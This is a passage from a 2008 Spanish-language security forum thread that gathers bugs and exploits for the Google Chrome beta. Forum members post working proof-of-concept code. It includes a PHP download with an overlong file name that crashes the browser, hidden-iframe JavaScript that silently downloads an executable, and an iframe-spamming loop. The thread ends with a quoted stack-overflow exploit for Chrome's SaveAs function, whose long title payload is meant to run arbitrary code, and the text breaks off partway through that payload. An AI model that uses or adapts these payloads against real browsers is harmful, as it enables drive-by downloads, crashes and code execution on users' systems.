elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 09:13  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32  (Leído 25,993 veces)
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #15 en: 4 Septiembre 2008, 16:14 »

La 'Etica' dice que no se sacan advisories ni poc de programas beta.
Al contrario, se sacan para que los arreglen antes de que sea una versión estable :¬¬.. lo que sí es "mas" ético es no publicar las cosas hasta que las arreglen, pero no siempre se puede.

WHK, me hubieras dicho y te ayudaba con la traducción :xD.

Saludos!!

PD. Un gusto verlo por aqui hakim
En línea

APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.749


Toys in the attic.


Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #16 en: 4 Septiembre 2008, 18:49 »

Ey! probablemente estes en la pista de un zero day... XD
Este google chrome esta demasiado beta como para que lo use nadie...
Un abrazo
APOKLIPTICO
En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #17 en: 4 Septiembre 2008, 23:12 »

Citar
Este google chrome esta demasiado beta como para que lo use nadie...
Creeme que si google lanza un ejecutable y lo expone en su página principal lo mas seguro es que miles de personas lo ejecuten sin saber de que se trate. Tampoco creo que todos sus visitantes tengan alguna noción sobre el estado de aquel proyecto por lo cual solo se limitan a bajarlo y usarlo y ven que está rápido entonces lo siguen usando.
En línea


WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #18 en: 5 Septiembre 2008, 00:58 »

encontré un bug un poco mas elegante  :P se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

 :xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código
<?php
 
/*
Google Chrome 0.2.149.27 (1583) Silent Crash PoC
WHK - elhacker.net
*/

 
$nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
$contenido = 'prueba';
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$nombre");
print($contenido);
 
/*
http://www.jccharry.com/pruebas/Google%20Chrome/2.php
http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
http://milw0rm.com/exploits/6365
*/

 
?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar  :-*
« Última modificación: 5 Septiembre 2008, 06:43 por WHK » En línea


berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.127



Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #19 en: 5 Septiembre 2008, 03:00 »


@WHK

En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..

-berz3k.

En línea
Micah Genji

Desconectado Desconectado

Mensajes: 52


learn more to life


Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #20 en: 5 Septiembre 2008, 05:11 »

Vaya solo pense dar una vuelta por el foro para ver que opinaban sobre el nuevo explorador y a la vez lo rapido que se pudo encontrar bugs, si siguen asi en una semana quien sabe cuantos bugs vayan :)
En línea

Only two things are infinite, the universe and human stupidity, and I'm not sure about the former : A.E
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.707


Nie Dam Sie


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #21 en: 5 Septiembre 2008, 05:38 »

A mi la verdad que no me entra todavia en la cabeza como pudieron encontrar un bug como este  :-X :-\

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Es increible que a Google se le haya pasado algo asi. Esa mania de sacar betas/alpha sin ningun minimo testeo.



pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P
« Última modificación: 5 Septiembre 2008, 05:40 por Litlehorse » En línea


@NeedOfSecurity

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #22 en: 5 Septiembre 2008, 05:47 »

Citar
pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:
Citar
about:

Contenido:
Citar
Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.


El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365



Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
« Última modificación: 5 Septiembre 2008, 07:41 por WHK » En línea


hackeen

Desconectado Desconectado

Mensajes: 10


=Hackeen=


Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #23 en: 5 Septiembre 2008, 07:50 »


 ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D



Código:
<html>
<script>
function down(){
document.write('<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" frameborder="0" width="0" height="0"></iframe>');
}
setInterval("down()",200)
</script>

 ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D
En línea

=BHT=
Trancek

Desconectado Desconectado

Mensajes: 29


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #24 en: 5 Septiembre 2008, 17:16 »

Y otro mas que hace uso de la funcion SaveAs, vamos que tienes que guardar la pagina en tu pc, y poca gente hace eso yo creo...

http://security.bkis.vn/

---
We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator)

http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
En línea

berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.127



Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #25 en: 5 Septiembre 2008, 19:28 »

Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC



-berz3k.

En línea
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #26 en: 6 Septiembre 2008, 00:31 »

Por ahí escuché que Google Chrome no soporta RSS  :(

http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss
En línea


WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #27 en: 6 Septiembre 2008, 01:26 »

desbordamiento de la memoria y la ejecución arbitraria de código..

Código
<html>
<head>
<!--
This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.
 
Here comes details :
 
We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this.
 
The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems.
 
To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
 
Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
 
Discoverer : Le Duc Anh - SVRT - Bkis
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems…
 
Website : http://security.bkis.vn
Mail : svrt[at]bkav.com.vn
-->
 
<title>
&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;